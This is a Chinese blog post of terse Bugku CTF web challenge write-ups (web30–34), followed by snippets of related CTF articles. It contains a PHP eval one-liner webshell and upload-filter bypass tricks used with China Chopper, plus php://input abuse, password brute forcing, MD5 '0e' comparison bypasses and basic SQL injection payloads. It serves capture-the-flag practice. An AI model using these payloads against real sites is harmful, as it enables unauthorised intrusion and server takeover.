[Bugku][Web][CTF] 30-33 write up

最新推荐文章于 2021-06-02 09:17:29 发布
最新推荐文章于 2021-06-02 09:17:29 发布
阅读量166 收藏
点赞数
分类专栏: CTF 文章标签: Bugku Web CTF write up
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dadongwudi/article/details/111770263
版权

【说明】 整合资源 简略版本2020Bugku write up

web30
关键字: txt or file_get_contents( f n ) 知 识 点 : f i l e g e t c o n t e n t s ( fn) 知识点: file_get_contents( fn)filegetcontents(fn) 联想 php://input
步骤:
1.1 可以将参数设为php://input,同时post想设置的文件内容,php执行时会将post内容当作文件内容

2.1 根据提示 ?ac=bugku&fn=flag.txt
https://blog.csdn.net/baidu_39504221/article/details/111578802

web 31 好像需要管理员
构造 提示:/resusl.php?x=admin
步骤:1.抓包

  1. 打开发现代码 爆破密码passwd : admin

web 32 (无解)
关键字:
知识点:
步骤:头部Content-Type: multipart/form-data;中的multipart改成Multipart,即Content-Type: Multipart/form-data;,再将上传文件的后缀改成php4,最后再改改Content-Type: image/png
参考链接:https://blog.csdn.net/s11show_163/article/details/104585686
https://blog.csdn.net/EC_Carrot/article/details/111630819
知识点:https://blog.csdn.net/lilongsy/article/details/108149819

web 33
关键字: php加解密
https://blog.csdn.net/weixin_33682790/article/details/94573445

web 34
关键字: 中国菜刀 病毒脚本拿权限
知识点: view-source

步骤:
1.view-source发现 upload.php
2.一句话上传病毒 <?php phpinfo(); eval($_POST['test']); ?> 发现<?php ?>一头一尾被替换
3.修改为 上传
4.上传后成功绕过

5.首页右键添加 选择php脚本 填写test密码

6.在根目录里面找到flag

https://blog.csdn.net/baidu_39504221/article/details/111593339

未完待续

CryptWinter
关注
专栏目录
Bugku web——各种绕过
qq_40481505的博客
09-24 615
打开题目连接,获得源码: <?php highlight_file('flag.php'); $_GET['id'] = urldecode($_GET['id']); $flag = 'flag{xxxxxxxxxxxxxxxxxx}'; if (isset($_GET['uname']) and isset($_POST['passwd'])) { if ($_GET['unam...
[Bugku][Web][CTF] 16-29 write up
dadongwudi的博客
12-26 349
web16 备份是个好习惯 /index.php.bak 查看php代码 1.因为md5()函数加密不能处理数组,则key1和key2的返回值为空,即可获得flag http://123.206.87.240:8002/web16/?kkeyey1[]=1&kkeyey2[]=4 2.利用==比较漏洞 如果两个字符经MD5加密后的值为 0exxxxx形式,就会被认为是科学计数法,且表示的是0*10的xxxx次方,还是零,都是相等的。 下列的字符串的MD5值都是0e开头的: QNKCDZO 2406
Bugku Web33
JJT
05-13 287
Bugku Web33 描述:fR4aHWwuFCYYVydFRxMqHhhCKBseH1dbFygrRxIWJ1UYFhotFjA= 下载文件,是一段php代码,提示给的字符串应该就是flag加密后得到的字符串,现在需要对其解密,得到flag,代码如下 <?php function encrypt($data,$key) { $key = md5('ISCC'); #729623334f0aa2784a1599fd374c120d $x = 0; $len = strle
Bugku-WEB-web33
fallingskies
01-05 308
<?php function encrypt($data,$key) { $key = md5('ISCC'); #729623334f0aa2784a1599fd374c120d $x = 0; $len = strlen($data); $klen = strlen($key); for ($i=0; $i < $len; $i++) { if ($x == $klen) { $x = 0; .
bugku web web3
weixin_30576859的博客
02-20 240
flag就在这里快来找找吧http://123.206.87.240:8002/web3/ 点进去这个页面可以看到不断地有提示 flag就在这里 来找找吧 那就找一找哇 在source中可以找到一行注释 &#75;&#69;&#89;&#123;&#74;&#50;&#115;&#97;&#52;&amp...
bugku web33
PRCORANGE的博客
04-20 185
题目: fR4aHWwuFCYYVydFRxMqHhhCKBseH1dbFygrRxIWJ1UYFhotFjA= <?php function encrypt($data,$key) { $key = md5('ISCC'); $x = 0; $len = strlen($data); $klen = strlen($key); for ($i=0; $i < $len; $i++) { if ($x == $klen)
BugkuCTF练习题解——Web
qq_41739275的博客
08-24 6587
文章目录1.Web22.计算器3.Web基础$_GET4.Web基础$_POST5.矛盾6.Web37.域名解析8.你必须让他停下9.本地包含10.变量111.Web512.头等舱13.网站被黑14.管理员系统15.Web416.flag在index中17.输入密码查看flag18.点击100万次19.备份是个好习惯 1.Web2 打开链接之后是滑稽笑脸,好家伙,吓我一跳,还以为是大bug,然后也没有提示啥的 感觉有点无从下手???别急,打开页面源代码(检查元素也可)瞅瞅 注释部分就是flag了。 2.
[Bugku][Crypto][CTF][2020]Crypto 1-20 write up
dadongwudi的博客
12-27 1093
工具:CaptEncoder https://www.freebuf.com/sectool/188397.html Convert:https://pan.baidu.com/s/17YPXfvBHl_HyA00AffTBvg 密码:skqw 推荐网站:http://ctf.ssleye.com/ Crypto 1 关键字: 莫斯 /.- 步骤:莫斯解码得:FLAG%u7bD3FCBF17F9399504%u7d,%u7b web解码得{,%u7d web解码得}。中间的大写转换为小写,组合起来就是fla
CTF_论剑场(bugku新平台)部分题目write up
城南以南花亦开
03-31 2738
CTF_论剑场(bugku新平台) 部分题目write up(1)头像签到0和1的故事最简单的pwnweb26web1这个人真的很高web9Snake进制转换流量分析ezsypdf 头像 使用WinHex打开图片,尝试搜索关键字“flag”,发现flag; 按照题目要求,使用所找到flag的md5 32位加密值进行验证,发现flag错误; 换个方式,将所找到flag先进行base64解码,...
bugku Web write up 一
0verWatch的博客
02-14 2743
web2 view-source:查看源码即可 文件上传测试 上传一个PHP文件发现他要的是图片文件,抓包先改一下content-type为image/jpeg,Go一下发现flag 计算器 F12调出开发者工具,把maxlength改为更长的长度即可 web基础$_GET 完全就是考php基础,直接URL加上index.php?what=flag即可 web基...
Bugku CTF web33Web
ChaoYue_miku的博客
03-16 269
0、打开网页,下载附件 与其说是web题,更像是密码题,只不过用了PHP语言 <?php function encrypt($data,$key) { $key = md5('ISCC'); $x = 0; $len = strlen($data); $klen = strlen($key); for ($i=0; $i < $len; $i++) { if ($x == $klen) {
BugKu-web篇-web33
jiuyongpinyin的博客
06-02 143
web33 这道题已经超出能力范围了,所以直接附上大神的链接和解密代码 https://blog.csdn.net/zzldm/article/details/112002644 <?php function decrypt($str) { $mkey = "729623334f0aa2784a1599fd374c120d"; $klen = strlen($mkey); $tmp = $str; $tmp = base64_decode($tmp); // 对 b
bugku_writeup】web33 Flag{xxx} ##PHP 含秘钥的可逆加密解密算法
kkza的博客
01-06 350
提示是一段base64编码的? 似乎没什么作用 题目附件下载下来,打开是php文档 md5加密ISCC,md5(str, raw) raw=False 默认32位 $key =729623334f0aa2784a1599fd374c120d $klen = 32 $data是啥来的?难道是之前提示所给的,但这个函数名字叫encrypt 加密,是不是这个所谓的base64就是这个加密算法得出来的呢?那再捋一下这个算法 ord() 函数返回字符串的首个字符的 ASCI...
bugku PHP_encrypt_1(ISCCCTF)
小白渣的博客
09-15 628
PHP_encrypt_1(ISCCCTF) 别说了感觉巨难 用到了密码学和MD5加解密 只能搬照大佬的wirteup 了 给出了一个 encrypt 函数和一串密文
bugku web33-40 wp
h0ryit的博客
06-03 1697
md5 collision 要求input a,题目提示很清楚了。 利用php的特性: PHP在处理哈希字符串时,会利用”!=”或”==”来对哈希值进行比较,它把每一个以”0E”开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希值都是以”0E”开头的,那么PHP将会认为他们相同,都是0。 0e开头的MD5汇总 payload:?a=s878926199a ...
flag在index里
a674212706的博客
03-27 349
题目:http://123.206.87.240:8005/post/ 我们来看这一题 首先打开题目 他让点击就点击呗 跳转到另一个新的界面 这就没了??? 。。。 没思路就对了   //假装证明自己还有进步的空间???? 去偷瞟一下别人的WP 稍微有点思路了 这道题是本地文件包含漏洞+php伪协议...
掘安杯原题复现-——flag到底在哪里
weixin_44866139的博客
04-13 2711
##掘安杯原题复现——flag在哪里 打开题目链接 点击flag在哪里,发现出现404notfound 查看网页源代码,发现没有提供有用信息 抓包试试,惊奇地发现flag,但并不是我们想要的 在线base64解密即可得到flag ...
flag就在flag.php中
热门推荐
Peithon的博客
05-13 9万+
Web1 题目地址 1.访问题目存在一个登录界面 2.注册一个用户登录,然后会跳转到另一个界面,会给出一些提示 3.访问flag.php,试试可不可以得到flag 提示admin可以得到flag,然后跳转回登录界面,猜测这和Cookie是有关的 4.抓包 发现在Cookie里有username,而且每一个用户的username是不一样的,后面的值是base64加密...
Bugkuweb36
qq_46230755的博客
02-05 530
有一个登录页面,习惯性先扫扫 查看一些include发现存在文件 点击进去看不见什么代码,然后再看看别的东西 /images 里面存在提示。这题应该是有注入的漏洞。 当user进行输入的时候,会转换成0,直接输入0时,是没有值的。但是我们可以通过闭合字符串来实现。 构造'-0-',对user=’’=0进行闭合。 user=''=0 user=''-0-''=0 此时我们可以构造sql语句来获得密码 (这里我不会写,去别的师傅wp看的) admin'-(ascii(MID((passwd)f
bugku ctf sqli-0x1题解
最新发布
03-23
bugku ctf是一个CTF(Capture The Flag)比赛平台,提供各种类型的安全挑战题目供参赛者解答。sqli-0x1是其中一个SQL注入题目,下面是该题目的解题思路: 1. 题目描述:sqli-0x1是一个简单的SQL注入题目,要求获取数据库中的某个表的内容。 2. 分析注入点:首先,我们需要找到注入点。可以通过在输入框中输入一些特殊字符(如'、"、;等)来尝试触发SQL注入。如果页面返回异常或者显示不正常,那么很可能存在注入点。 3. 判断注入类型:确定注入点后,我们需要判断注入类型。可以通过在输入框中输入一些测试语句(如' or 1=1--)来判断是否存在注入漏洞。如果页面返回正常,那么很可能存在注入漏洞。 4. 获取数据库信息:一旦确认存在注入漏洞,我们可以通过构造合适的SQL语句来获取数据库信息。可以使用UNION SELECT语句来获取表的列数和列名,然后使用SELECT语句获取表的内容。 5. 构造SQL语句:根据题目要求,我们需要获取某个表的内容。可以使用如下语句来获取表的内容: SELECT column_name FROM information_schema.columns WHERE table_name='表名'; SELECT * FROM 表名; 6. 获取结果:根据构造的SQL语句,将其作为输入发送给服务器,获取返回的结果。根据返回的结果,我们可以得到表的列数、列名和表的内容。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值